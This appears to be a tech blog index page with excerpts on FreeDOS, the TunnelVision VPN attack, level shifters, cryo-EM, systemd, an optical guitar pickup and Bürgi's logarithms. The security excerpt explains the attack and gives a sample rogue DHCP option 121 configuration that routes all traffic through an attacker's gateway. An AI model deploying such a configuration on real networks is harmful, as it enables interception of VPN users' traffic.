Nearly 30 Years Of FreeDOS And Looking Ahead To The Future

Blinky, the friendly FreeDOS mascot.

The first version of FreeDOS was released on September 16, 1994, following Microsoft’s decision to cease development of MS-DOS in favor of Windows. That version 0.01 was still an Alpha release, with 0.1 from 1998 the first Beta, and the first stable release (1.0, released on September 3, 2006) still a while off. Even so, its main developer [Jim Hall] and the like-minded developers on the FreeDOS team managed to put together a very functional DOS from a shell, kernel, and other elements, some of which already existed before [Jim] pitched the FreeDOS (initially PD-DOS, for Public Domain DOS) idea.

Nearly thirty years later, [Jim] reflects on these decades and the strong uptake of what many today would consider just a version of an antiquated OS. For embedded and industrial applications, of course, a simple DOS is all you want and need, and the same goes for a utility you boot from a USB stick. FreeDOS has proven to be a boon within the retro computing community as well, allowing old PCs to run a modern DOS rather than being stuck on a version of MS-DOS from the early 90s.

For FreeDOS’ future, [Jim] is excited to see what other applications people may find for this OS, including as a teaching tool on account of how uncomplicated FreeDOS is. In a world of complicated OSes that no single mortal can comprehend any more, FreeDOS is really quite a breath of fresh air.

This Week In Security: TunnelVision, Scarecrows, And Poutine

There’s a clever “new” attack against VPNs, called TunnelVision, done by researchers at Leviathan Security. To explain why we put “new” in quotation marks, I’ll just share my note-to-self on this one written before reading the write-up: “Doesn’t using a more specific DHCP route do this already?” And indeed, that’s the secret here: in routing, the more specific route wins. I could not have told you that DHCP option 121 is used to set extra static routes, so that part was new to me. So let’s break this down a bit, for those that haven’t spent the last 20 years thinking about DHCP, networking, and VPNs.

So up first, a route is a collection of values that instruct your computer how to reach a given IP address, and the set of routes on a computer is the routing table. On one of my machines, the (slightly simplified) routing table looks like:

# ip route
default via 10.0.1.1 dev eth0
10.0.1.0/24 dev eth0

The first line there is the default route, where “default” is a short-hand for 0.0.0.0/0. That indicates a network using Classless Inter-Domain Routing (CIDR) notation. When the Internet was first developed, it was segmented into networks using network classes A, B, and C. The problem there was that the world was limited to just over 2.1 million networks on the Internet, which has since proven to be not nearly enough. CIDR came along, eliminated the classes, and gave us subnets instead.

In CIDR notation, the value after the slash is commonly called the netmask, and indicates the number of bits that are dedicated to the network identifier, and how many bits are dedicated to the address on the network. Put more simply, the bigger the number after the slash, the fewer usable IP addresses on the network. In the context of a route, the IP address here is going to refer to a network identifier, and the whole CIDR string identifies that network and its size.
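
As a quick worked example (addresses made up), compare two netmasks:

10.0.1.0/24  →  24 network bits, 8 host bits: 10.0.1 is fixed,
                leaving 256 addresses (10.0.1.0 through 10.0.1.255)
10.0.0.0/16  →  16 network bits, 16 host bits: 10.0 is fixed,
                leaving 65,536 addresses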

Back to my routing table, the two routes are a bit different. The first one uses the “via” term to indicate we use a gateway to reach the indicated network. On its own, that doesn’t make any sense, as the 10.0.1.1 address is itself on the 0.0.0.0/0 network. The second route saves the day, indicating that the 10.0.1.0/24 network is directly reachable out the eth0 device. This works because the more specific route, the one with the bigger netmask value, takes precedence.
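
On Linux you can ask the kernel directly which route wins for a given destination. Against the example table above, that looks something like this (output trimmed, addresses illustrative):

# ip route get 10.0.1.42
10.0.1.42 dev eth0 src 10.0.1.5
# ip route get 93.184.216.34
93.184.216.34 via 10.0.1.1 dev eth0 src 10.0.1.5

The local address matches the /24 and goes straight out eth0, while everything else falls through to the default route and its gateway.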

The next piece to understand is DHCP, the Dynamic Host Configuration Protocol. That’s the way most machines get an IP address from the local network. DHCP not only assigns IP addresses, but it also sets additional information via numeric options. Option 1 is the subnet mask, option 6 advertises DNS servers, and option 3 sets the local router IP. That router is then generally used to construct the default route on the connecting machine — 0.0.0.0/0 via router_IP.
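
To put faces on those numbers, here is roughly how the classic options look in a dnsmasq-style DHCP server configuration (values illustrative):

# dnsmasq-style DHCP options, set by number
dhcp-option=1,255.255.255.0   # option 1: subnet mask
dhcp-option=3,10.0.1.1        # option 3: router, becomes the default route
dhcp-option=6,10.0.1.1        # option 6: DNS server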

Remember the problem with the gateway IP address belonging to the default network? There’s a similar issue with VPNs. If you want all traffic to flow over the VPN device, tun0, how does the VPN traffic get routed across the Internet to the VPN server? And how does the VPN deal with the existence of the default route set by DHCP? By leaving those routes in place, and adding more specific routes. That’s usually 0.0.0.0/1 and 128.0.0.0/1, neatly slicing the entire Internet into two networks, and routing both through the VPN. These routes are more specific than the default route, but leave the router-provided routes in place to keep the VPN itself online.
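
Put together, the routing table on a machine with a typical full-tunnel VPN up looks something like this sketch (addresses made up):

# ip route (full-tunnel VPN connected, trimmed)
default via 10.0.1.1 dev eth0
0.0.0.0/1 dev tun0
128.0.0.0/1 dev tun0
10.0.1.0/24 dev eth0
203.0.113.7 via 10.0.1.1 dev eth0

That last host route pins the VPN server itself (203.0.113.7 here) to the real gateway, so the encrypted tunnel traffic never tries to route through the tunnel.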

And now enter TunnelVision. The key here is DHCP option 121, which sets additional CIDR notation routes. The very same trick a VPN uses to override the network’s default route can be used against it. Yep, DHCP can simply inform a client that networks 0.0.0.0/2, 64.0.0.0/2, 128.0.0.0/2, and 192.0.0.0/2 are routed through malicious_IP. You’d see it if you actually checked your routing table, but how often does anybody do that, when not working a problem?
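
Nothing exotic is needed to pull this off, either. In a dnsmasq-style configuration, a hypothetical rogue DHCP server could push the whole attack in a single option (192.0.2.66 standing in for the attacker’s gateway):

# Hypothetical rogue DHCP server: option 121 routes that are more
# specific than a VPN's 0.0.0.0/1 and 128.0.0.0/1
dhcp-option=121,0.0.0.0/2,192.0.2.66,64.0.0.0/2,192.0.2.66,128.0.0.0/2,192.0.2.66,192.0.0.0/2,192.0.2.66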

There is a CVE assigned, CVE-2024-3661, but there’s an interesting question raised: Is this a vulnerability, and in which component? And what’s the right solution? To the first question, everything is basically working the way it is supposed to. The flaw is that some VPNs make the assumption that a /1 route is a bulletproof way to override the default route. The solution is a bit trickier. Continue reading “This Week In Security: TunnelVision, Scarecrows, And Poutine”

Logic analyzer capture, showing the rails constantly oscillating at a high rate

When Your Level Shifter Is Too Smart To Function

By now, 3.3 V has become a comfortable and common logic level for basically anything you might be hacking. However, sometimes you still need to interface your GPIOs with devices at 5 V, 1.8 V, or something even less common like 2.5 V. At this point, you might stumble upon autosensing level shifters, like the TXB010x series from Texas Instruments, and decide that they’re perfect: no need to worry about pin direction or bother with pullups. Just wire up your GPIOs and the two voltage rails, and you’re good to go. [Joshua0] warns us, however, that not everything is hunky dory in the automagic shifting world.

During board bring-up and multimeter probing, he found that the 1.8 V-shifted RESET signal went down to 1.0 V, and its 3.3 V counterpart stayed at 2.6 V. Was it a current fight between GPIOs? A faulty connection? Voltage rail instability? It got more confusing as the debugging session revealed the shifter operating normally whenever the test points involved were probed with the multimeter in a certain order. After re-reading the datasheet and spotting a note about reflection sensitivity, [Joshua0] realized he should probe the signals with a high-speed logic analyzer instead.

Continue reading “When Your Level Shifter Is Too Smart To Function”

Cryo-EM: Freezing Time To Take Snapshots Of Myosin And Other Molecular Systems

Using technologies like electron microscopy (EM), it is possible to capture molecular mechanisms in great detail, but not while those mechanisms are in motion. The field of cryomicroscopy circumvents this limitation by freezing the mechanism in place using cryogenic fluids. Although X-ray crystallography was initially the common choice, the much more versatile EM is now the standard approach in the form of cryo-EM, with recent advances giving us unprecedented looks at the mechanisms that quite literally make our bodies move.

Myosin-5 working stroke and walking on F-actin. (Credit: Klebl et al., 2024)

The past years have seen many refinements in cryo-EM, with previously quite manual approaches shifting to microfluidics to increase the time resolution at which a molecular process can be frozen, enabling researchers to see, for example, the myosin motor proteins go through their motions one step at a time. Research articles on this have been published previously, such as one by [Ahmet Mentes] and colleagues in 2018 on myosin force sensing to adjust to dynamic loads. More recently, [David P. Klebl] and colleagues published a research article this year on the myosin-5 powerstroke through ATP hydrolysis, using a modified (slower) version of myosin-5. Even so, the freezing has to be done with millisecond accuracy to capture the myosin in the act of priming (pre-powerstroke).

The most amazing thing about cryo-EM is that it allows us to examine processes that used to be the subject of theory and speculation, as we had no means to observe the motion and components involved directly. The more we can increase the time resolution of cryo-EM, the more details we can glimpse, whether it’s the functioning of myosins in muscle tissue or inside cells, the folding of proteins, or determining the proteins involved in a range of diseases, such as the role of TDP-43 in amyotrophic lateral sclerosis (ALS) in a 2021 study by [Diana Arseni] and colleagues.

As our methods of freezing these biomolecular moments in time improve, so too will our ability to validate theory with observations. Some of these methods combine cryogenic freezing with laser pulses to alternately freeze and resume processes, allowing them to be recorded in minute detail at sub-millisecond resolution. One big issue that remains is that although some of these researchers have even open sourced their cryo-EM methods, commercial vendors have not yet picked up this technology, limiting its reach as researchers have to cobble something together themselves.

Hopefully before long (time-resolved) cryo-EM will be as common as EM is today, to the point where even a hobby laboratory may have one lounging around.

Linux Fu: Getting Started With Systemd

I will confess. I started writing this post about some stupid systemd tricks. However, I wanted to explain a little about systemd first, and that wound up being longer than the tricks. So this Linux Fu will be some very fundamental systemd information. The next one will have some examples, including how to automount a Raspberry Pi Pico. Of course, by the end of this post, you’ll have only scratched the surface of systemd, but I did want to give you some context for reading through the rest of it.

Like many long-time Unix users, I’m not a big fan of systemd. Then again, I’m also waiting for the whole “windows, icon, mouse, pointer” fad to die down. Like it or not, systemd is here and probably here to stay for the foreseeable future. I don’t want to get into a flame war over systemd. Love it or hate it, it is a fact of life. I will say that it does have some interesting features. I will also say that the documentation has gotten better over time. But I will also say that it made many changes that perhaps didn’t need to be made and made some simple things more complicated than they needed to be.

In the old days, we used “init scripts,” and you can still do so if you are really motivated. They weren’t well documented either, but it was pretty easy to puzzle out the shell scripts that would run, and we all know how to write shell scripts. The systemd way is to use services that are not defined by shell scripts. However, systemd tries to do lots of other things, too. It can replace cron and run things periodically. It can replace inetd, syslog, and many other traditional services. This is a benefit or a drawback, depending on your point of view.
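
For the muscle memory, the translation from the old way to the new looks roughly like this (service name illustrative):

# SysV init style:
/etc/init.d/sshd restart
# systemd equivalent:
systemctl restart sshd.service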

(Editor’s note: And this logging functionality was exactly what was abused in last week’s insane liblzma / ssh backdoor.)

Configuring systemd requires you to create files in one of several locations. In systemd lingo, these are “units.” For the purpose of this Linux Fu, we’ll look at only a few kinds of units: services, mounts, and timers. Services let you run programs in response to something like system start-up. You can require that certain other services already be running or not running, among many other options. If the service dies, you can ask systemd to automatically restart it, or not. Timers can trigger a service at a particular time, much like cron does. Another unit type you’ll run into is the socket, which represents (you guessed it) a network socket.
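
To make that concrete, here is a minimal sketch of a service unit and a matching timer. The hello name and the logger payload are made up for illustration:

# /etc/systemd/system/hello.service -- a hypothetical one-shot service
[Unit]
Description=Log a friendly greeting

[Service]
Type=oneshot
ExecStart=/usr/bin/logger "hello from systemd"

# /etc/systemd/system/hello.timer -- fires hello.service once a day
[Unit]
Description=Run hello.service daily

[Timer]
OnCalendar=daily
Persistent=true

[Install]
WantedBy=timers.target

With the files in place, systemctl daemon-reload followed by systemctl enable --now hello.timer registers and starts the timer; a timer activates the service of the same name by default.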

Continue reading “Linux Fu: Getting Started With Systemd”

Optical Guitar Pickup Works With Nylon Strings

Electric guitar pickups rely on steel strings interfering with a magnetic field, the changes in which are picked up with coils of wire. That doesn’t work with nylon strings, because they don’t tend to perturb magnetic fields nearly as much, beyond some infinitesimal level that some quantum physicist could explain. So what do you do? You follow [Simon]’s example, and build an optical pickup instead.

The concept is simple. You place an LED and a phototransistor in a U-shaped channel, positioned so that the string runs through it, and repeat this for each string. Thus, as a string vibrates, it interrupts the light travelling from the LED to the phototransistor. This generates a voltage that varies with the frequency of the string’s vibration. Funnily enough, this type of pickup will work just fine on both nylon and steel strings, if you were so inclined to try it.

[Simon] designed a nifty PCB with six LED-phototransistor pairs (using off-the-shelf interrupter sensors) for use with a nylon-stringed guitar. He reports that sound from the strings comes through clearly, but that some noise is evident in the pickup’s output, too. Listening to the demo, it seems to capture the sound of the nylon strings well; it’s just a shame that the noise floor is so high.

If you prefer your guitar pickups to be the regular magnetic kind, you can always wind your own from scrap. Demo after the break.

Continue reading “Optical Guitar Pickup Works With Nylon Strings”

Joost Bürgi And Logarithms

Logarithms are a common idea today, even though we don’t use them as often as we used to. After all, one of the major uses of logarithms is to simplify computations, and computers do that just fine (although they might use logs internally). But 400 years ago, doing math was painful. Enter Joost Bürgi. According to [Welch Labs], his book of mathematical tables should have changed math forever. But it didn’t.

If you know how a slide rule works, you’ll find you already know much of what the video shows. The clockmaker was one of the people who worked out how logs could simplify many difficult equations. He created a table of 23,030 “red and black” numbers to nine digits. Essentially, this was a table of logarithms to a very unusual base: 1.0001.

Why such a strange base? Because it allowed interpolation to a higher accuracy than a larger base would. Red numbers are, of course, the logarithms, and the black numbers are antilogs. The real tables are a bit hard to read because he omitted digits that didn’t change and scaled parts of them by ten (which was changed in the video below to simplify things). It doesn’t help, either, that decimal points hadn’t been invented yet.
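
A quick worked example of how such a table gets used (numbers rounded, and not Bürgi’s actual layout): to multiply, you look up the red numbers, add them, and find the sum among the black numbers.

red(2) ≈  6,931.8   because 1.0001^6931.8  ≈ 2
red(3) ≈ 10,986.7   because 1.0001^10986.7 ≈ 3
red(2) + red(3) ≈ 17,918.5, and 1.0001^17918.5 ≈ 6 = 2 × 3

It also hints at why the base works so well: since 1.0001^10000 is almost exactly e, the red numbers are essentially natural logarithms scaled by 10,000.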

What was really impressive, though, was the disk-like construct on the cover of the book. Although it wasn’t mentioned in the text, it is clear this was meant to allow you to build a circular slide rule, which [Welch Labs] does and demonstrates in the video.

Unfortunately, the book was not widely known, and Napier gets the credit for inventing and popularizing logarithms. Napier published in 1614, while Bürgi published in 1620, though both men likely had their tables in some form much earlier. Kepler knew of the Bürgi tables as early as 1610 and was dismayed that they were not published.

While we enjoy all kinds of retrocomputers, the slide rule may be the original. Want to make your own circular version? You don’t need to find a copy of this book.

Continue reading “Joost Bürgi And Logarithms”